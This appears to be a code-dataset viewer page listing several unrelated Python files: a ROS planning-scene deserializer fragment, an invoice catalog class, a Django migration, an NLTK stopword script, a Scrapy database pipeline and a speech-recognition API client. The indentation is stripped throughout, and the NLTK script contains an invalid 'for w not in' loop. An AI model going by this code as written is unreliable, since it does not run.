(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v197 = val1.position
_x = _v197
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v198 = val1.orientation
_x = _v198
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v199 = val1.header
start = end
end += 4
(_v199.seq,) = _struct_I.unpack(str[start:end])
_v200 = _v199.stamp
_x = _v200
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v199.frame_id = str[start:end].decode('utf-8')
else:
_v199.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v201 = val1.transform
_v202 = _v201.translation
_x = _v202
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v203 = _v201.rotation
_x = _v203
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)
val1.enabled = map(bool, val1.enabled)
self.planning_scene.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v204 = val1.shape
start = end
end += 1
(_v204.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v204.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v204.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v204.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v204.vertices.append(val3)
_v205 = val1.pose_stamped
_v206 = _v205.header
start = end
end += 4
(_v206.seq,) = _struct_I.unpack(str[start:end])
_v207 = _v206.stamp
_x = _v207
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v206.frame_id = str[start:end].decode('utf-8')
else:
_v206.frame_id = str[start:end]
_v208 = _v205.pose
_v209 = _v208.position
_x = _v209
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v210 = _v208.orientation
_x = _v210
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v211 = val1.header
start = end
end += 4
(_v211.seq,) = _struct_I.unpack(str[start:end])
_v212 = _v211.stamp
_x = _v212
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v211.frame_id = str[start:end].decode('utf-8')
else:
_v211.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v213 = val1.operation
start = end
end += 1
(_v213.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v214 = val2.position
_x = _v214
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v215 = val2.orientation
_x = _v215
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v216 = val1.object
_v217 = _v216.header
start = end
end += 4
(_v217.seq,) = _struct_I.unpack(str[start:end])
_v218 = _v217.stamp
_x = _v218
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v217.frame_id = str[start:end].decode('utf-8')
else:
_v217.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v216.id = str[start:end].decode('utf-8')
else:
_v216.id = str[start:end]
start = end
end += 4
(_v216.padding,) = _struct_f.unpack(str[start:end])
_v219 = _v216.operation
start = end
end += 1
(_v219.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v216.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v216.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v216.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v220 = val3.position
_x = _v220
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v221 = val3.orientation
_x = _v221
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v216.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v222 = val1.center
_x = _v222
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v223 = val1.extents
_x = _v223
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v224 = val1.axis
_x = _v224
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene.collision_map.boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_b = struct.Struct("<b")
_struct_d = struct.Struct("<d")
_struct_f = struct.Struct("<f")
_struct_3f = struct.Struct("<3f")
_struct_3I = struct.Struct("<3I")
_struct_4d = struct.Struct("<4d")
_struct_2I = struct.Struct("<2I")
_struct_3d = struct.Struct("<3d")
class GetPlanningScene(object):
_type = 'arm_navigation_msgs/GetPlanningScene'
_md5sum = '0a7b07718e4e5c5d35740c730509a151'
_request_class = GetPlanningSceneRequest
_response_class = GetPlanningSceneResponse
|
5,195 | 37feeba8ff682e5998fde4bcba8c37043cb593f2 | # coding=utf-8
from smallinvoice.commons import BaseJsonEncodableObject, BaseService
class Catalog(BaseJsonEncodableObject):
def __init__(self, catalog_type, unit, name, cost_per_unit, vat=0):
self.type = catalog_type
self.unit = unit
self.name = name
self.cost_per_unit = cost_per_unit
self.vat = vat
class CatalogService(BaseService):
name = 'catalog'
|
5,196 | d65d85b4573728ed32ccf987459d5a228e2a8897 | # Generated by Django 3.1.7 on 2021-04-16 14:03
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AuditLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('action_time', models.DateTimeField(auto_now=True, verbose_name='操作时间')),
('user', models.CharField(max_length=64, verbose_name='操作者')),
('obj', models.TextField(blank=True, null=True, verbose_name='操作对象')),
('operate_type', models.CharField(max_length=32, verbose_name='操作类型')),
('change_message', models.TextField(blank=True, verbose_name='操作信息')),
],
options={
'verbose_name': '操作日志',
'ordering': ['-id'],
},
),
]
|
5,197 | 90f5629ac48edfccea57243ffb6188a98123367d | from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
#Print Stop words
stop_words = set(stopwords.words("english"))
print(stop_words)
example_text = "This is general sentence to just clarify if stop words are working or not. I have some awesome projects coming up"
words = word_tokenize(example_text)
filtered_sentence = []
for w in words:
for w not in stop_words:
filtered_sentence.append(w)
#print filtered sentences
print(filtered_sentence)
#print in a line
filtered_sentence1 = [w for w in words if not w in stop_words]
#print filtered sentences
print(filtered_sentence1)
|
5,198 | 16074fc1824a99b6fd1c4bf113d5b752308e8803 | from sqlalchemy.orm import sessionmaker
from IMDB.spiders.models import IMDB_DATABASE, db_connect, create_table
class ScrapySpiderPipeline(object):
# Bu Fonksiyon Veritabanı bağlantısını ve oturum oluşturucuyu başlatır ve bir İlişkisel Veritabanı tablosu oluşturur.
def __init__(self):
engine = db_connect()
create_table(engine)
self.Session = sessionmaker(bind=engine)
# Bu Fonksiyon Spiderdan Gelen Dataları Models.py Dosyasındaki Model Şablonuna Göre İşleme Sokarak Verileri Database İçine Kaydeder
def process_item(self, item, spider):
session = self.Session()
ım_db = IMDB_DATABASE()
ım_db.MOVIE_CODE = item["MOVIE_CODE"]
ım_db.MOVIE_NAME = item["MOVIE_NAME"]
ım_db.YEAR = item["YEAR"]
ım_db.RANK = item["RANK"]
ım_db.IMDB_RATING = item["IMDB_RATING"]
# Buradaki Try Except istisna blokları datalar kaydedilirken varsa oluşan hataları ayıklayarak bizlere mesaj olarak döner
try:
session.add(ım_db)
session.commit()
except:
session.rollback()
raise
finally:
session.close()
return item
|
5,199 | 421b0c1871350ff541b4e56d1e18d77016884552 | # -*- coding: utf-8 -*-
"""Transcoder with TOSHIBA RECAIUS API."""
import threading
import queue
import time
import numpy as np
from logzero import logger
import requests
import model.key
AUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'
VOICE_URL = 'https://api.recaius.jp/asr/v2/voices'
class Transcoder:
"""Transcoder Class."""
def __init__(self):
"""Constructor."""
logger.info('__init__:Enter')
self._token = None
self.transcript = None
self._queue = queue.Queue()
def start(self, token):
"""Start recognition."""
logger.info('start:Enter')
self._token = token
threading.Thread(target=self._process).start()
def write_stream(self, buf):
"""Write audio stream."""
self._queue.put(buf)
def _process(self):
logger.info('_process:Enter')
token = self._authenticate()['token']
uuid = self._start_recognition(token)['uuid']
logger.info('start transcode')
i = 1
while True:
arr = self._stream_generator()
if(arr is None):
break
# logger.debug(f'{len(arr)} , {self._queue.qsize()}')
inline = np.hstack(arr)
arr_bytes = inline.tobytes('C')
header = {
'Content-Type': 'multipart/form-data',
'X-Token': token
}
files = {
'voice_id': ('', i, ''),
'voice': ('', arr_bytes, 'application/octet-stream')
}
resp = requests.put(
f'{VOICE_URL}/{uuid}', headers=header, files=files)
if(resp.status_code == 200):
logger.debug(resp.json())
result = resp.json()[0]
if(result[0] == 'TMP_RESULT' or result[0] == 'RESULT'):
self._write_result(result[1])
i = i + 1
self._flush_recognition(uuid, token, i)
while True:
if(self._get_result(uuid, token) is None):
break
time.sleep(0.1)
self._end_recognition(uuid, token)
logger.info('end transcode')
def _authenticate(self):
speechrecog_jajp_id = model.key.RECAIUS_ID
speechrecog_jajp_password = model.key.RECAIUS_PASSWORD
param = {
"speech_recog_jaJP": {
'service_id': speechrecog_jajp_id,
'password': speechrecog_jajp_password
}
}
return requests.post(AUTH_URL, json=param).json()
def _flush_recognition(self, uuid, token, i):
header = {
'Content-Type': 'application/json',
'X-Token': token
}
param = {
'voice_id': i,
}
resp = requests.put(
f'{VOICE_URL}/{uuid}/flush', headers=header, json=param)
if(resp.status_code == 200):
logger.debug(f'frush result:{resp.json()}')
return resp.json()
else:
logger.debug(f'flush result(status:{resp.status_code})')
def _get_result(self, uuid, token):
header = {
'X-Token': token
}
resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)
if(resp.status_code == 200):
logger.debug(f'get result:{resp.json()}')
return resp.json()
else:
logger.debug(f'get result(status:{resp.status_code})')
def _stream_generator(self):
arr = []
while True:
try:
v = self._queue.get_nowait()
# print(v)
if v is None:
return None
arr.append((v * 32767).astype(np.int16))
except queue.Empty:
if(len(arr) != 0):
break
else:
time.sleep(0.1)
return arr
def _start_recognition(self, token):
header = {
'Content-Type': 'application/json',
'X-Token': token
}
param = {
'model_id': 1
}
return requests.post(VOICE_URL, headers=header, json=param).json()
def _end_recognition(self, uuid, token):
header = {
'X-Token': token
}
resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)
if(resp.status_code == 204):
logger.debug(f'delete result(status:{resp.status_code})')
def _write_result(self, transcipt):
self.transcript = transcipt
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.